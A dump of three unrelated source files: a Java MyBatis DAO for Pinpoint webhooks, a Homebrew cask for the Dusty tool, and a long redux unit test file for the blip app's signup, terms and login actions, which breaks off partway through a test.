package com.navercorp.pinpoint.web.dao.mysql; import com.navercorp.pinpoint.web.dao.WebhookDao; import com.navercorp.pinpoint.web.vo.Webhook; import org.mybatis.spring.SqlSessionTemplate; import org.springframework.beans.factory.annotation.Qualifier; import org.springframework.stereotype.Repository; import java.util.List; import java.util.Objects; @Repository public class MysqlWebhookDao implements WebhookDao { private static final String NAMESPACE = WebhookDao.class.getName() + "."; private final SqlSessionTemplate sqlSessionTemplate; public MysqlWebhookDao(@Qualifier("sqlSessionTemplate") SqlSessionTemplate sqlSessionTemplate) { this.sqlSessionTemplate = Objects.requireNonNull(sqlSessionTemplate, "sqlSessionTemplate"); } @Override public String insertWebhook(Webhook webhook) { sqlSessionTemplate.insert(NAMESPACE + "insertWebhook", webhook); return webhook.getWebhookId(); } @Override public void deleteWebhook(Webhook webhook) { sqlSessionTemplate.insert(NAMESPACE + "deleteWebhook", webhook); } @Override public void updateWebhook(Webhook webhook) { sqlSessionTemplate.update(NAMESPACE + "updateWebhook", webhook); } @Override public void deleteWebhookByApplicationId(String applicationId) { sqlSessionTemplate.insert(NAMESPACE + "deleteWebhookByApplicationId", applicationId); } @Override public void deleteWebhookByServiceName(String serviceName) { sqlSessionTemplate.insert(NAMESPACE + "deleteWebhookByServiceName", serviceName); } @Override public List<Webhook> selectWebhookByApplicationId(String applicationId) { return sqlSessionTemplate.selectList(NAMESPACE + "selectWebhookByApplicationId", applicationId); } @Override public List<Webhook> selectWebhookByServiceName(String serviceName) { return sqlSessionTemplate.selectList(NAMESPACE + "selectWebhookByServiceName", serviceName); } @Override public List<Webhook> selectWebhookByRuleId(String ruleId) { return sqlSessionTemplate.selectList(NAMESPACE + "selectWebhookByRuleId", ruleId); } @Override public Webhook selectWebhook(String webhookId) { return sqlSessionTemplate.selectOne(NAMESPACE + "selectWebhook", webhookId); } }
benja-M-1/homebrew-cask
Casks/dusty.rb
cask "dusty" do version "0.7.5" sha256 "9e6cb17530053ffa7ba75bd4fd2b5840dc6508bd1d70166f3e6179ed30f5f721" url "https://github.com/gamechanger/dusty/releases/download/#{version}/dusty.tar.gz" appcast "https://github.com/gamechanger/dusty/releases.atom" name "Dusty" homepage "https://github.com/gamechanger/dusty" depends_on cask: "docker-toolbox" container type: :tar installer script: { executable: "brew-install.sh", args: [staged_path], sudo: true, } binary "dusty" uninstall launchctl: "com.gamechanger.dusty" zap trash: "/etc/dusty" end
gcharest/blip
test/unit/redux/actions/async.test.js
<reponame>gcharest/blip /* global chai */ /* global sinon */ /* global describe */ /* global it */ /* global expect */ /* global beforeEach */ /* global before */ /* global afterEach */ /* global after */ /* global context */ import configureStore from 'redux-mock-store'; import thunk from 'redux-thunk'; import trackingMiddleware from '../../../../app/redux/utils/trackingMiddleware'; import _ from 'lodash'; import isTSA from 'tidepool-standard-action'; import initialState from '../../../../app/redux/reducers/initialState'; import * as ErrorMessages from '../../../../app/redux/constants/errorMessages'; import * as UserMessages from '../../../../app/redux/constants/usrMessages'; import { TIDEPOOL_DATA_DONATION_ACCOUNT_EMAIL, MMOLL_UNITS } from '../../../../app/core/constants'; // need to require() async in order to rewire utils inside const async = require('../../../../app/redux/actions/async'); describe('Actions', () => { const trackMetric = sinon.spy(); const mockStore = configureStore([ thunk, trackingMiddleware({ metrics: { track: trackMetric } }) ]); afterEach(function() { // very important to do this in an afterEach than in each test when __Rewire__ is used // if you try to reset within each test you'll make it impossible for tests to fail! async.__ResetDependency__('utils'); trackMetric.resetHistory(); }) describe('Asynchronous Actions', () => { describe('signup', () => { it('should trigger SIGNUP_SUCCESS and it should call signup and get once for a successful request', () => { let user = { id: 27 }; let api = { user: { signup: sinon.stub().callsArgWith(1, null, user), } }; let expectedActions = [ { type: 'SIGNUP_REQUEST' }, { type: 'SIGNUP_SUCCESS', payload: { user: { id: 27 } } }, { type: '@@router/CALL_HISTORY_METHOD', payload: { args: [ '/email-verification' ], method: 'push' } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.signup(api, {foo: 'bar'})); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(trackMetric.calledWith('Signed Up')).to.be.true; }); it('should trigger ACCEPT_TERMS_REQUEST if the user user accepted terms in the signup form', () => { const acceptedDate = new Date().toISOString(); const loggedInUserId = false; const termsData = { termsAccepted: acceptedDate }; const user = { id: 27, }; const initialStateForTest = _.merge({}, initialState, { blip: { loggedInUserId } }); const api = { user: { signup: sinon.stub().callsArgWith(1, null, user), acceptTerms: sinon.stub().callsArgWith(1, null, user), } }; const accountDetails = { termsAccepted: acceptedDate, } const store = mockStore(initialStateForTest); store.dispatch(async.signup(api, accountDetails)); const actions = store.getActions(); const action = _.find(actions, { type: 'ACCEPT_TERMS_REQUEST' }); expect(isTSA(action)).to.be.true; }); it('[409] should trigger SIGNUP_FAILURE and it should call signup once and get zero times for a failed signup request', () => { let user = { id: 27 }; let api = { user: { signup: sinon.stub().callsArgWith(1, {status: 409, body: 'Error!'}, null), } }; let err = new Error(ErrorMessages.ERR_ACCOUNT_ALREADY_EXISTS); err.status = 409; let expectedActions = [ { type: 'SIGNUP_REQUEST' }, { type: 'SIGNUP_FAILURE', error: err, meta: { apiError: {status: 409, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.signup(api, {foo: 'bar'})); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_ACCOUNT_ALREADY_EXISTS }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.user.signup.callCount).to.equal(1); }); it('[500] should trigger SIGNUP_FAILURE and it should call signup once and get zero times for a failed signup request', () => { let user = { id: 27 }; let api = { user: { signup: sinon.stub().callsArgWith(1, {status: 500, body: 'Error!'}, null) } }; let err = new Error(ErrorMessages.ERR_SIGNUP); err.status = 500; let expectedActions = [ { type: 'SIGNUP_REQUEST' }, { type: 'SIGNUP_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.signup(api, {foo: 'bar'})); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_SIGNUP }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.user.signup.callCount).to.equal(1); }); }); describe('confirmSignup', () => { it('should trigger CONFIRM_SIGNUP_SUCCESS and it should call confirmSignup once for a successful request', () => { let user = { id: 27 }; let api = { user: { confirmSignUp: sinon.stub().callsArgWith(1, null) } }; let expectedActions = [ { type: 'CONFIRM_SIGNUP_REQUEST' }, { type: 'CONFIRM_SIGNUP_SUCCESS' } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.confirmSignup(api, 'fakeSignupKey')); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.user.confirmSignUp.calledWith('fakeSignupKey')).to.be.true; expect(api.user.confirmSignUp.callCount).to.equal(1); }); it('should trigger CONFIRM_SIGNUP_FAILURE and it should call confirmSignup once for a failed request', () => { let user = { id: 27 }; let api = { user: { confirmSignUp: sinon.stub().callsArgWith(1, {status: 500, body: 'Error!'}) } }; let err = new Error(ErrorMessages.ERR_CONFIRMING_SIGNUP); err.status = 500; let expectedActions = [ { type: 'CONFIRM_SIGNUP_REQUEST' }, { type: 'CONFIRM_SIGNUP_FAILURE', error: err, payload: { signupKey: 'fakeSignupKey' }, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.confirmSignup(api, 'fakeSignupKey')); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_CONFIRMING_SIGNUP }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.user.confirmSignUp.calledWith('fakeSignupKey')).to.be.true; expect(api.user.confirmSignUp.callCount).to.equal(1); }); it('[409] should trigger CONFIRM_SIGNUP_FAILURE and it should call confirmSignup once for a failed request and redirect for password creation', () => { let user = { id: 27 }; let api = { user: { confirmSignUp: sinon.stub().callsArgWith(1, {status: 409, message: 'User does not have a password'}) } }; let err = new Error(ErrorMessages.ERR_CONFIRMING_SIGNUP); err.status = 409; let expectedActions = [ { type: 'CONFIRM_SIGNUP_REQUEST' }, { type: 'CONFIRM_SIGNUP_FAILURE', error: err, payload: { signupKey: 'fakeSignupKey' }, meta: { apiError: {status: 409, message: 'User does not have a password'} } }, { type: '@@router/CALL_HISTORY_METHOD', payload: { args: [ '/verification-with-password?signupKey=fakeSignupKey&signupEmail=<EMAIL>' ], method: 'push' } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.confirmSignup(api, 'fakeSignupKey', '<EMAIL>')); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_CONFIRMING_SIGNUP }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.user.confirmSignUp.calledWith('fakeSignupKey')).to.be.true; expect(api.user.confirmSignUp.callCount).to.equal(1); }); }); describe('verifyCustodial', () => { it('should trigger ACKNOWLEDGE_NOTIFICATION for the confirmingSignup notification if set', () => { let user = { id: 27 }; let key = 'fakeSignupKey'; let email = '<EMAIL>'; let birthday = '07/18/1988'; let password = '<PASSWORD>'; let creds = { username: email, password: password }; let api = { user: { custodialConfirmSignUp: sinon.stub().callsArgWith(3, null), login: sinon.stub().callsArgWith(2, null), get: sinon.stub().callsArgWith(0, null, user) } }; let expectedAction = { type: 'ACKNOWLEDGE_NOTIFICATION', payload: { acknowledgedNotification: 'confirmingSignup' } }; let initialStateForTest = _.merge({}, initialState, { blip: { working: { confirmingSignup: { notification: 'hi' } } } }); let store = mockStore(initialStateForTest); store.dispatch(async.verifyCustodial(api, key, email, birthday, password)); const actions = store.getActions(); expect(actions[0]).to.eql(expectedAction); }); it('should trigger VERIFY_CUSTODIAL_SUCCESS and it should call verifyCustodial once for a successful request', () => { let user = { id: 27, emailVerified: true }; let key = 'fakeSignupKey'; let email = '<EMAIL>'; let birthday = '07/18/1988'; let password = '<PASSWORD>'; let creds = { username: email, password: password }; let api = { user: { custodialConfirmSignUp: sinon.stub().callsArgWith(3, null), login: sinon.stub().callsArgWith(2, null), get: sinon.stub().callsArgWith(0, null, user) } }; let expectedActions = [ { type: 'VERIFY_CUSTODIAL_REQUEST' }, { type: 'LOGIN_REQUEST' }, { type: 'FETCH_USER_REQUEST' }, { type: 'FETCH_USER_SUCCESS', payload: { user: user } }, { type: 'LOGIN_SUCCESS', payload: { user: user } }, { type: 'VERIFY_CUSTODIAL_SUCCESS' }, { type: '@@router/CALL_HISTORY_METHOD', payload: { args: [ '/patients?justLoggedIn=true' ], method: 'push' } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let initialStateForTest = _.merge({}, initialState, { blip: { working: { confirmingSignup: { notification: null } } } }); let store = mockStore(initialStateForTest); store.dispatch(async.verifyCustodial(api, key, email, birthday, password)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.user.custodialConfirmSignUp.calledWith(key, birthday, password)).to.be.true; expect(api.user.custodialConfirmSignUp.callCount).to.equal(1); expect(trackMetric.calledWith('VCA Home Verification - Verified')).to.be.true; expect(trackMetric.calledWith('Logged In')).to.be.true; }); it('should trigger VERIFY_CUSTODIAL_FAILURE and it should call verifyCustodial once for a failed request', () => { let user = { id: 27 }; let key = 'fakeSignupKey'; let email = '<EMAIL>'; let birthday = '07/18/1988'; let password = '<PASSWORD>'; let api = { user: { custodialConfirmSignUp: sinon.stub().callsArgWith(3, {status: 500, body: 'Error!'}) } }; let err = new Error(ErrorMessages.ERR_CONFIRMING_SIGNUP); err.status = 500; let expectedActions = [ { type: 'VERIFY_CUSTODIAL_REQUEST' }, { type: 'VERIFY_CUSTODIAL_FAILURE', error: err, payload: { signupKey: 'fakeSignupKey' }, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let initialStateForTest = _.merge({}, initialState, { blip: { working: { confirmingSignup: { notification: null } } } }); let store = mockStore(initialStateForTest); store.dispatch(async.verifyCustodial(api, key, email, birthday, password)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_CONFIRMING_SIGNUP }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.user.custodialConfirmSignUp.calledWith(key, birthday, password)).to.be.true; expect(api.user.custodialConfirmSignUp.callCount).to.equal(1); }); }); describe('resendEmailVerification', () => { it('should trigger RESEND_EMAIL_VERIFICATION_SUCCESS and it should call resendEmailVerification once for a successful request', () => { const email = '<EMAIL>'; let api = { user: { resendEmailVerification: sinon.stub().callsArgWith(1, null) } }; let expectedActions = [ { type: 'RESEND_EMAIL_VERIFICATION_REQUEST' }, { type: 'RESEND_EMAIL_VERIFICATION_SUCCESS', payload: {notification: {type: 'alert', message: 'We just sent you an e-mail.'}} } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.resendEmailVerification(api, email)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.user.resendEmailVerification.calledWith(email)).to.be.true; expect(api.user.resendEmailVerification.callCount).to.equal(1); }); it('should trigger RESEND_EMAIL_VERIFICATION_FAILURE and it should call resendEmailVerification once for a failed request', () => { const email = '<EMAIL>'; let api = { user: { resendEmailVerification: sinon.stub().callsArgWith(1, {status: 500, body: 'Error!'}) } }; let err = new Error(ErrorMessages.ERR_RESENDING_EMAIL_VERIFICATION); err.status = 500; let expectedActions = [ { type: 'RESEND_EMAIL_VERIFICATION_REQUEST' }, { type: 'RESEND_EMAIL_VERIFICATION_FAILURE', error: err, meta: {apiError: {status: 500, body: 'Error!'}} } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.resendEmailVerification(api, email)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_RESENDING_EMAIL_VERIFICATION }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.user.resendEmailVerification.calledWith(email)).to.be.true; expect(api.user.resendEmailVerification.callCount).to.equal(1); }); }); describe('acceptTerms', () => { it('should trigger ACCEPT_TERMS_SUCCESS and it should call acceptTerms once for a successful request', () => { let acceptedDate = new Date(); let loggedInUserId = 500; let termsData = { termsAccepted: new Date() }; let api = { user: { acceptTerms: sinon.stub().callsArgWith(1, null) } }; let expectedActions = [ { type: 'ACCEPT_TERMS_REQUEST' }, { type: 'ACCEPT_TERMS_SUCCESS', payload: { userId: loggedInUserId, acceptedDate: acceptedDate } }, { type: '@@router/CALL_HISTORY_METHOD', payload: { args: [ '/patients?justLoggedIn=true' ], method: 'push' } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let initialStateForTest = _.merge({}, initialState, { blip: { loggedInUserId: loggedInUserId } }); let store = mockStore(initialStateForTest); store.dispatch(async.acceptTerms(api, acceptedDate)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.user.acceptTerms.calledWith(termsData)).to.be.true; expect(api.user.acceptTerms.callCount).to.equal(1); }); it('should trigger ACCEPT_TERMS_SUCCESS and it should call acceptTerms once for a successful request, routing to clinic info for clinician', () => { let acceptedDate = new Date(); let loggedInUserId = 500; let termsData = { termsAccepted: new Date() }; let user = { roles: ['clinic'] }; let api = { user: { acceptTerms: sinon.stub().callsArgWith(1, null, user) } }; let expectedActions = [ { type: 'ACCEPT_TERMS_REQUEST' }, { type: 'ACCEPT_TERMS_SUCCESS', payload: { userId: loggedInUserId, acceptedDate: acceptedDate } }, { type: '@@router/CALL_HISTORY_METHOD', payload: { args: [ '/clinician-details' ], method: 'push' } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let initialStateForTest = _.merge({}, initialState, { blip: { loggedInUserId: loggedInUserId } }); let store = mockStore(initialStateForTest); store.dispatch(async.acceptTerms(api, acceptedDate)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.user.acceptTerms.calledWith(termsData)).to.be.true; expect(api.user.acceptTerms.callCount).to.equal(1); }); it('should trigger ACCEPT_TERMS_SUCCESS and should not trigger a route transition if the user is not logged in', () => { let acceptedDate = new Date(); let loggedInUserId = false; let termsData = { termsAccepted: new Date() }; let user = { id: 27, roles: ['clinic'], }; let api = { user: { acceptTerms: sinon.stub().callsArgWith(1, null, user) } }; let expectedActions = [ { type: 'ACCEPT_TERMS_REQUEST' }, { type: 'ACCEPT_TERMS_SUCCESS', payload: { userId: user.id, acceptedDate: acceptedDate } }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let initialStateForTest = _.merge({}, initialState, { blip: { loggedInUserId: loggedInUserId } }); let store = mockStore(initialStateForTest); store.dispatch(async.acceptTerms(api, acceptedDate, user.id)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.user.acceptTerms.calledWith(termsData)).to.be.true; expect(api.user.acceptTerms.callCount).to.equal(1); expect(_.find(actions, { type: '@@router/CALL_HISTORY_METHOD' })).to.be.undefined; }); it('should trigger ACCEPT_TERMS_FAILURE and it should call acceptTerms once for a failed request', () => { let acceptedDate = new Date(); let termsData = { termsAccepted: acceptedDate }; let loggedInUserId = 500; let api = { user: { acceptTerms: sinon.stub().callsArgWith(1, {status: 500, body: 'Error!'}) } }; let err = new Error(ErrorMessages.ERR_ACCEPTING_TERMS); err.status = 500; let expectedActions = [ { type: 'ACCEPT_TERMS_REQUEST' }, { type: 'ACCEPT_TERMS_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let initialStateForTest = _.merge({}, initialState, { blip: { loggedInUserId: loggedInUserId } }); let store = mockStore(initialStateForTest); store.dispatch(async.acceptTerms(api, acceptedDate)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_ACCEPTING_TERMS }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.user.acceptTerms.calledWith(termsData)).to.be.true; expect(api.user.acceptTerms.callCount).to.equal(1); }); }); describe('login', () => { it('should trigger LOGIN_SUCCESS and it should call login and user.get once for a successful request', () => { let creds = { username: 'bruce', password: '<PASSWORD>' }; let user = { id: 27, emailVerified: true }; let api = { user: { login: sinon.stub().callsArgWith(2, null), get: sinon.stub().callsArgWith(0, null, user), logout: sinon.stub(), }, clinics: { getClinicianInvites: sinon.stub().callsArgWith(1, null, []), getClinicsForClinician: sinon.stub().callsArgWith(2, null, []), }, }; let expectedActions = [ { type: 'LOGIN_REQUEST' }, { type: 'FETCH_USER_REQUEST' }, { type: 'FETCH_USER_SUCCESS', payload: { user: user } }, { type: 'LOGIN_SUCCESS', payload: { user: user } }, { type: '@@router/CALL_HISTORY_METHOD', payload: { args: [ '/patients?justLoggedIn=true' ], method: 'push' } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.login(api, creds)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.user.login.calledWith(creds)).to.be.true; expect(api.user.get.callCount).to.equal(1); expect(trackMetric.calledWith('Logged In')).to.be.true; }); it('should trigger LOGIN_SUCCESS and it should call login, user.get and patient.get once for a successful request', () => { let creds = { username: 'bruce', password: '<PASSWORD>' }; let user = { id: 27, profile: { patient: true }, emailVerified: true }; let patient = { foo: 'bar' }; let api = { user: { login: sinon.stub().callsArgWith(2, null), get: sinon.stub().callsArgWith(0, null, user), logout: sinon.stub(), }, patient: { get: sinon.stub().callsArgWith(1, null, patient), }, clinics: { getClinicianInvites: sinon.stub().callsArgWith(1, null, []), getClinicsForClinician: sinon.stub().callsArgWith(2, null, []), }, }; let expectedActions = [ { type: 'LOGIN_REQUEST' }, { type: 'FETCH_USER_REQUEST' }, { type: 'FETCH_USER_SUCCESS', payload: { user: user } }, { type: 'FETCH_PATIENT_REQUEST' }, { type: 'FETCH_PATIENT_SUCCESS', payload: { patient: patient } }, { type: 'LOGIN_SUCCESS', payload: { user: _.merge({}, user, patient) } }, { type: '@@router/CALL_HISTORY_METHOD', payload: { args: [ '/patients?justLoggedIn=true' ], method: 'push' } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.login(api, creds)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.user.login.calledWith(creds)).to.be.true; expect(api.user.get.callCount).to.equal(1); expect(api.patient.get.callCount).to.equal(1); expect(trackMetric.calledWith('Logged In')).to.be.true; }); it('should trigger LOGIN_SUCCESS and it should redirect a clinician with no clinic profile to the clinician details form', () => { const creds = { username: 'bruce', password: '<PASSWORD>' }; const user = { id: 27, roles: [ 'clinic' ], profile: {}, emailVerified: true }; const patient = { foo: 'bar' }; const api = { user: { login: sinon.stub().callsArgWith(2, null), get: sinon.stub().callsArgWith(0, null, user), logout: sinon.stub(), }, patient: { get: sinon.stub().callsArgWith(1, null, patient), }, clinics: { getClinicianInvites: sinon.stub().callsArgWith(1, null, []), getClinicsForClinician: sinon.stub().callsArgWith(2, null, []), }, }; const expectedActions = [ { type: 'LOGIN_REQUEST' }, { type: 'FETCH_USER_REQUEST' }, { type: 'FETCH_USER_SUCCESS', payload: { user: user } }, { type: 'LOGIN_SUCCESS', payload: { user } }, { type: '@@router/CALL_HISTORY_METHOD', payload: { method: 'push', args: [ '/clinician-details' ] } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); const store = mockStore(initialState); store.dispatch(async.login(api, creds)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.user.login.calledWith(creds)).to.be.true; expect(api.user.get.callCount).to.equal(1); expect(trackMetric.calledWith('Logged In')).to.be.true; }); it('should trigger LOGIN_SUCCESS and it should redirect a clinician with a clinic profile to the patients view', () => { const creds = { username: 'bruce', password: '<PASSWORD>' }; const user = { id: 27, roles: ['clinic'], profile: { clinic: true }, emailVerified: true }; const patient = { foo: 'bar' }; const api = { user: { login: sinon.stub().callsArgWith(2, null), get: sinon.stub().callsArgWith(0, null, user), logout: sinon.stub(), }, patient: { get: sinon.stub().callsArgWith(1, null, patient), }, clinics: { getClinicianInvites: sinon.stub().callsArgWith(1, null, []), getClinicsForClinician: sinon.stub().callsArgWith(2, null, []), }, }; const expectedActions = [ { type: 'LOGIN_REQUEST' }, { type: 'FETCH_USER_REQUEST' }, { type: 'FETCH_USER_SUCCESS', payload: { user: user } }, { type: 'LOGIN_SUCCESS', payload: { user } }, { type: '@@router/CALL_HISTORY_METHOD', payload: { method: 'push', args: ['/patients?justLoggedIn=true'] } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); const store = mockStore(initialState); store.dispatch(async.login(api, creds)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.user.login.calledWith(creds)).to.be.true; expect(api.user.get.callCount).to.equal(1); expect(trackMetric.calledWith('Logged In')).to.be.true; }); context('clinic interface is enabled', () => { let api; let creds; let clinics; let invites; let user; let patient; let patients; let setAPIData; before(() => { async.__Rewire__('config', { CLINICS_ENABLED: true, }); }); beforeEach(() => { creds = { username: 'bruce', password: '<PASSWORD>' }; setAPIData = returnData => { const invitesError = _.get(returnData, 'invitesError', null); const clinicsError = _.get(returnData, 'clinicsError', null); const patientsError = _.get(returnData, 'patientsError', null); clinics = _.get(returnData, 'clinics', clinics); invites = _.get(returnData, 'invites', invites); user = _.get(returnData, 'user', user); patient = _.get(returnData, 'patient', patient); patients = _.get(returnData, 'patients', patients); api = { user: { login: sinon.stub().callsArgWith(2, null), get: sinon.stub().callsArgWith(0, null, user), getAssociatedAccounts: sinon.stub().callsArgWith(0, patientsError, { patients }), logout: sinon.stub(), }, patient: { get: sinon.stub().callsArgWith(1, null, patient) }, clinics: { getClinicianInvites: sinon.stub().callsArgWith(1, invitesError, invites), getClinicsForClinician: sinon.stub().callsArgWith(2, clinicsError, clinics), }, }; }; }); after(() => { async.__ResetDependency__('config'); }); context('clinician has no clinic invites or associated clinics', () => { beforeEach(() => { setAPIData({ clinics: [], invites: [], patient: { foo: 'bar' }, patients: [], }); }); it('should trigger LOGIN_SUCCESS and it should redirect a clinician with no clinic profile to the clinician details form', () => { setAPIData({ user: { userid: 27, roles: [ 'clinic' ], profile: {}, emailVerified: true }, }); const expectedActions = [ { type: 'LOGIN_REQUEST' }, { type: 'FETCH_USER_REQUEST' }, { type: 'FETCH_USER_SUCCESS', payload: { user: user } }, { type: 'GET_CLINICS_FOR_CLINICIAN_REQUEST' }, { type: 'GET_CLINICS_FOR_CLINICIAN_SUCCESS', payload: { clinicianId: 27, clinics: [] }}, { type: 'FETCH_CLINICIAN_INVITES_REQUEST' }, { type: 'FETCH_CLINICIAN_INVITES_SUCCESS', payload: { invites: [] }}, { type: 'FETCH_ASSOCIATED_ACCOUNTS_REQUEST' }, { type: 'FETCH_ASSOCIATED_ACCOUNTS_SUCCESS', payload: { patients: [] }}, { type: 'LOGIN_SUCCESS', payload: { user } }, { type: '@@router/CALL_HISTORY_METHOD', payload: { method: 'push', args: [ '/clinician-details' ] } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); const store = mockStore(initialState); store.dispatch(async.login(api, creds)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.user.login.calledWith(creds)).to.be.true; expect(api.user.get.callCount).to.equal(1); expect(trackMetric.calledWith('Logged In')).to.be.true; }); it('should trigger LOGIN_SUCCESS and it should redirect a clinician with a clinic profile to the patients view', () => { setAPIData({ user: { userid: 27, roles: ['clinic'], profile: { clinic: true }, emailVerified: true } }); const expectedActions = [ { type: 'LOGIN_REQUEST' }, { type: 'FETCH_USER_REQUEST' }, { type: 'FETCH_USER_SUCCESS', payload: { user: user } }, { type: 'GET_CLINICS_FOR_CLINICIAN_REQUEST' }, { type: 'GET_CLINICS_FOR_CLINICIAN_SUCCESS', payload: { clinicianId: 27, clinics: [] }}, { type: 'FETCH_CLINICIAN_INVITES_REQUEST' }, { type: 'FETCH_CLINICIAN_INVITES_SUCCESS', payload: { invites: [] }}, { type: 'FETCH_ASSOCIATED_ACCOUNTS_REQUEST' }, { type: 'FETCH_ASSOCIATED_ACCOUNTS_SUCCESS', payload: { patients: [] }}, { type: 'LOGIN_SUCCESS', payload: { user } }, { type: '@@router/CALL_HISTORY_METHOD', payload: { method: 'push', args: ['/patients?justLoggedIn=true'] } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); const store = mockStore(initialState); store.dispatch(async.login(api, creds)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.user.login.calledWith(creds)).to.be.true; expect(api.user.get.callCount).to.equal(1); expect(trackMetric.calledWith('Logged In')).to.be.true; }); }); context('clinician has clinic invites', () => { beforeEach(() => { setAPIData({ clinics: [], invites: [ { inviteId: 'invite123' }, ], patient: { foo: 'bar' }, patients: [], }); }); it('should trigger LOGIN_SUCCESS and it should redirect a clinician with no clinic profile to the clinic details form', () => { setAPIData({ user: { userid: 27, roles: [ 'clinic' ], profile: {}, emailVerified: true }, }); const expectedActions = [ { type: 'LOGIN_REQUEST' }, { type: 'FETCH_USER_REQUEST' }, { type: 'FETCH_USER_SUCCESS', payload: { user: user } }, { type: 'GET_CLINICS_FOR_CLINICIAN_REQUEST' }, { type: 'GET_CLINICS_FOR_CLINICIAN_SUCCESS', payload: { clinicianId: 27, clinics: [] }}, { type: 'FETCH_CLINICIAN_INVITES_REQUEST' }, { type: 'FETCH_CLINICIAN_INVITES_SUCCESS', payload: { invites: [{ inviteId: 'invite123' }] }}, { type: 'FETCH_ASSOCIATED_ACCOUNTS_REQUEST' }, { type: 'FETCH_ASSOCIATED_ACCOUNTS_SUCCESS', payload: { patients: [] }}, { type: 'LOGIN_SUCCESS', payload: { user } }, { type: '@@router/CALL_HISTORY_METHOD', payload: { method: 'push', args: [ '/clinic-details' ] } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); const store = mockStore(initialState); store.dispatch(async.login(api, creds)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.user.login.calledWith(creds)).to.be.true; expect(api.user.get.callCount).to.equal(1); expect(trackMetric.calledWith('Logged In')).to.be.true; }); it('should trigger LOGIN_SUCCESS and it should redirect a clinician with a clinic profile to the workspaces view', () => { setAPIData({ user: { userid: 27, roles: ['clinic'], profile: { clinic: true }, emailVerified: true } }); const expectedActions = [ { type: 'LOGIN_REQUEST' }, { type: 'FETCH_USER_REQUEST' }, { type: 'FETCH_USER_SUCCESS', payload: { user: user } }, { type: 'GET_CLINICS_FOR_CLINICIAN_REQUEST' }, { type: 'GET_CLINICS_FOR_CLINICIAN_SUCCESS', payload: { clinicianId: 27, clinics: [] }}, { type: 'FETCH_CLINICIAN_INVITES_REQUEST' }, { type: 'FETCH_CLINICIAN_INVITES_SUCCESS', payload: { invites: [{ inviteId: 'invite123' }] }}, { type: 'FETCH_ASSOCIATED_ACCOUNTS_REQUEST' }, { type: 'FETCH_ASSOCIATED_ACCOUNTS_SUCCESS', payload: { patients: [] }}, { type: 'LOGIN_SUCCESS', payload: { user } }, { type: '@@router/CALL_HISTORY_METHOD', payload: { method: 'push', args: ['/workspaces'] } } ]; 